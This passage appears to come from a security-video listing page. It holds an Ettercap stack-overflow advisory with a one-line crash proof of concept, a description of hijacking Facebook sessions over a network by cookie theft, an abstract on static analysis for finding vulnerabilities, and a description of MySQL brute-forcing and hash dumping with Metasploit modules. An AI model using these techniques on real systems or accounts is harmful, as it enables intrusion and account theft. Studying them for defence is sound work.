   TR_ADDR_LEN = 6,
   FDDI_ADDR_LEN = 6,
   MEDIA_ADDR_LEN = 6,
   IP_ADDR_LEN = 4,
   IP6_ADDR_LEN = 16,
   MAX_IP_ADDR_LEN = IP6_ADDR_LEN,
   ETH_ASCII_ADDR_LEN = sizeof("ff:ff:ff:ff:ff:ff")+1,
   IP_ASCII_ADDR_LEN = sizeof("255.255.255.255")+1,
   IP6_ASCII_ADDR_LEN = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
   MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN,
};
[/code]

./include/ec_resolv.h:42
[code]
#define MAX_HOSTNAME_LEN 64
[/code]

./src/ec_scan.c:610-614
[code]
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];
[/code]

./src/ec_scan.c:633-635
[code]
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
    *ip == '#' || *mac == '#' || *name == '#')
   continue;
[/code]

---

PoC:
[code]
sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow
[/code]

---

+ Sajjad Pourali
+ http://www.securation.com
+ Contact: sajjad[at]securation.com

Source: Ettercap <= 0.7.5.1 Stack Overflow Vulnerability
-
Hijacking Facebook Accounts Over A Network

Description:

In this video I show you how to hijack Facebook accounts over a network using Ettercap, Wireshark, Grease Monkey and Cookie Injector. You will need the following for this to work:

Backtrack Linux - Pentesting operating system
Wireshark - Packet analyzer, comes with Backtrack 5
Firefox - Browser, comes with Backtrack 5+
Grease Monkey - Firefox addon
Cookie Injector - Script to dump Wireshark data

Links:
Backtrack Linux Download: BackTrack Linux - Penetration Testing Distribution
Passsniffer.sh from video: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf
Grease Monkey - Firefox addon: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
Cookie Injector for Grease Monkey: Original Cookie Injector for Greasemonkey

Credits to tedbear for the Passsniffer.sh script.

Source: Hijacking Facebook Accounts Over A Network
-
Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities

Description:

Abstract

We present our work of using interactive static analysis to improve upon static analysis techniques by introducing a new mixed-initiative paradigm for interacting with developers to aid in the detection and prevention of security vulnerabilities. The key difference between our approach and standard static analysis is interaction with the developers. Specifically, our approach is predicated on the following principles:

• Secure programming support should be targeted towards general developers who understand the application logic, but may have limited knowledge of secure programming;
• Secure programming support should be provided while the code is being developed, integrated into the development tools;
• Secure programming support should reduce the workload in detecting and resolving vulnerabilities; and
• Developers should be able to provide feedback about the application context that can drive customized security analysis.

We have performed evaluations of our approach using an active open source project, Apache Roller. Our results show that interactive data flow analysis can potentially reduce the effort of finding and fixing vulnerabilities by as much as 50%. Using interactive control flow analysis, we found cross request forgery vulnerabilities in the current Roller release. The Roller team issued patches based on our report (CVE-2012-2380). We have also performed user studies, both for students and for professional developers, with promising results. For example, preliminary data suggests that using ASIDE, students who do not have secure programming training can write much more secure code.

Original Source: Using Interactive Static Analysis for Early Detection of Software Vulnerabilities - Bill Chu on Vimeo

Source: Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities
-
Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit

Description:

In this video I will show you how to perform a brute-force attack on MySQL and how to use the John the Ripper hash cracking module in Metasploit Framework. When you are using the John the Ripper module, make sure that your database is connected to Metasploit Framework or you will get an error.

Modules used:

auxiliary/scanner/mysql/mysql_version
Enumerates the version of MySQL servers.

auxiliary/scanner/mysql/mysql_login
This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

auxiliary/scanner/mysql/mysql_hashdump
This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

Source: Penetration Testing Software | Metasploit

Source: Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit